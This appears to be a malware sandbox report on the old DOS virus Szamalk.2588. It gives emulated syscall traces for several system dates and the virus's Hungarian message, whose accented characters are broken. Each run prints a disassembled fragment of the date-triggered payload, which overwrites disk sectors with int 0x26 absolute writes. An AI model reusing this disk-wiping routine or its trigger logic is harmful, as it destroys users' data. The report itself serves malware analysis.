Sample viewer

vx.netlux.org/Virus.DOS.Szamalk.2588

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:00:47.048967461Z 26 PC: 13779 | Set disk transfer address
2018-12-17T23:00:47.051642342Z 42 PC: 1377d | Get date 0x1377d: cmp cx, 0x7ca
0x13781: jae 0x13786
0x13783: jmp 0x1388b
0x13786: cmp dh, 9
0x13789: jae 0x1378e
0x1378b: jmp 0x1388b
0x1378e: mov al, 2
0x13790: push ax
0x13791: mov cx, 0x80
0x13794: mov dx, word ptr [0x142]
0x13798: push ds
0x13799: mov bx, 0
0x1379c: mov ds, bx
0x1379e: int 0x26
0x137a0: popf
0x137a1: pop ds
0x137a2: add word ptr [0x142], 0x80
0x137a8: pop ax
0x137a9: cmp word ptr [0x142], 0x1000
0x137af: jb 0x13790
2018-12-17T23:00:47.075887044Z 9 PC: 137ea | Display string (String= '***** Terjed�si k�s�rlet Terjed�si id�szak: 1994.06.01.-1994.09.01. *****')
2018-12-17T23:00:47.079991058Z 9 PC: 137ea | Display string (String= 'A k�s�rlet a mai napon befejez�d�tt. A visszaigazol�sok')
2018-12-17T23:00:47.084756854Z 9 PC: 137ea | Display string (String= 'miatt az �n merevlemeze(i) m�r haszn�lhatatlanok. Bocs!')
2018-12-17T23:00:47.088508996Z 9 PC: 137ea | Display string (String= 'Hogy miel�bb elk�sz�lhessen az ezt a v�rust �rt�, �rt� j� v�-')
2018-12-17T23:00:47.09222113Z 9 PC: 137ea | Display string (String= 'rus�rt� program,k�rj�k �rjon valamelyik sz�m�t�stechnikai saj')
2018-12-17T23:00:47.095026975Z 9 PC: 137ea | Display string (String= '-t�org�numnak. A k�s�rlet eredm�ny�nek figyel�s�vel a k�vetke')
2018-12-17T23:00:47.099160006Z 9 PC: 137ea | Display string (String= '-z� hazai lapok lettek megb�zva: CHIP, ALAPLAP, COMPUTER Pano')
2018-12-17T23:00:47.102912738Z 9 PC: 137ea | Display string (String= '-r�ma (�m�t�stechnika haland�knak). Teh�t �rja meg hogy a k�-')
2018-12-17T23:00:47.106860738Z 9 PC: 137ea | Display string (String= 's�rlet eredm�nyes volt-e ! Seg�t�k�sz egy�ttm�k�d�se seg�t-')
2018-12-17T23:00:47.110915797Z 9 PC: 137ea | Display string (String= 's�g a gal�d v�rus�r�kkal szemben viselt szent h�bor�nkban !!!')
2018-12-17T23:00:47.11495587Z 9 PC: 137ea | Display string (String= '(B�r ki nem �rtjuk �ket, csak a v�rusaikat, mert nek�nk is �l')
2018-12-17T23:00:47.119064528Z 9 PC: 137ea | Display string (String= '-ni kell valamib�l !) Ne agg�djon ! Leperk�l n�h�nyezer forin')
2018-12-17T23:00:47.131255064Z 9 PC: 137ea | Display string (String= '-tot, �s mi k�ldj�k az �rt� j� v�rus�rt�nkat ! Persze te osto')
2018-12-17T23:00:47.135797048Z 9 PC: 137ea | Display string (String= '-ba, n�h�ny napon bel�l �j v�rusok sz�letnek , �s te perk�lsz')
2018-12-17T23:00:47.14035609Z 9 PC: 137ea | Display string (String= '�jra, mi meg gyarapodunk, de ilyen az �let. Seggfej ! M�sol-')
2018-12-17T23:00:47.145485589Z 9 PC: 137ea | Display string (String= 'gass csak �sz n�lk�l ezent�l is, mert ez nek�nk nagyon j� !!!')
2018-12-17T23:00:47.150045812Z 9 PC: 137ea | Display string (String= '�zleti �dv�zlettel: Rudnai Tam�s , Szegedi Imre , Kiss J�nos')
2018-12-17T23:00:47.154191649Z 9 PC: 137ea | Display string (String= 'A v�rus sz�let�si d�tuma: 1994.08.11. (0000004. p�ld�ny)')

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13646,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:39.975498118Z 26 PC: 13779 | Set disk transfer address
2018-12-25T12:38:39.977851244Z 42 PC: 1377d | Get date 0x1377d: cmp cx, 0x7ca
0x13781: jae 0x13786
0x13783: jmp 0x1388b
0x13786: cmp dh, 9
0x13789: jae 0x1378e
0x1378b: jmp 0x1388b
0x1378e: mov al, 2
0x13790: push ax
0x13791: mov cx, 0x80
0x13794: mov dx, word ptr [0x142]
0x13798: push ds
0x13799: mov bx, 0
0x1379c: mov ds, bx
0x1379e: int 0x26
0x137a0: popf
0x137a1: pop ds
0x137a2: add word ptr [0x142], 0x80
0x137a8: pop ax
0x137a9: cmp word ptr [0x142], 0x1000
0x137af: jb 0x13790
2018-12-25T12:38:39.993520907Z 37 PC: 13a05 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:38:39.994666095Z 26 PC: 13a4e | Set disk transfer address
2018-12-25T12:38:39.996783454Z 76 PC: 12a55 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1995,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13646,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:40.066322598Z 26 PC: 13779 | Set disk transfer address
2018-12-25T12:38:40.070112248Z 42 PC: 1377d | Get date 0x1377d: cmp cx, 0x7ca
0x13781: jae 0x13786
0x13783: jmp 0x1388b
0x13786: cmp dh, 9
0x13789: jae 0x1378e
0x1378b: jmp 0x1388b
0x1378e: mov al, 2
0x13790: push ax
0x13791: mov cx, 0x80
0x13794: mov dx, word ptr [0x142]
0x13798: push ds
0x13799: mov bx, 0
0x1379c: mov ds, bx
0x1379e: int 0x26
0x137a0: popf
0x137a1: pop ds
0x137a2: add word ptr [0x142], 0x80
0x137a8: pop ax
0x137a9: cmp word ptr [0x142], 0x1000
0x137af: jb 0x13790
2018-12-25T12:38:40.072815436Z 37 PC: 13a05 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:38:40.074133332Z 26 PC: 13a4e | Set disk transfer address
2018-12-25T12:38:40.075356884Z 76 PC: 12a55 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13646,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:40.613212133Z 26 PC: 13779 | Set disk transfer address
2018-12-25T12:38:40.616042206Z 42 PC: 1377d | Get date 0x1377d: cmp cx, 0x7ca
0x13781: jae 0x13786
0x13783: jmp 0x1388b
0x13786: cmp dh, 9
0x13789: jae 0x1378e
0x1378b: jmp 0x1388b
0x1378e: mov al, 2
0x13790: push ax
0x13791: mov cx, 0x80
0x13794: mov dx, word ptr [0x142]
0x13798: push ds
0x13799: mov bx, 0
0x1379c: mov ds, bx
0x1379e: int 0x26
0x137a0: popf
0x137a1: pop ds
0x137a2: add word ptr [0x142], 0x80
0x137a8: pop ax
0x137a9: cmp word ptr [0x142], 0x1000
0x137af: jb 0x13790
2018-12-25T12:38:40.619625104Z 37 PC: 13a05 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:38:40.621303698Z 26 PC: 13a4e | Set disk transfer address
2018-12-25T12:38:40.623473262Z 76 PC: 12a55 | Terminate with return code (Return code = '0')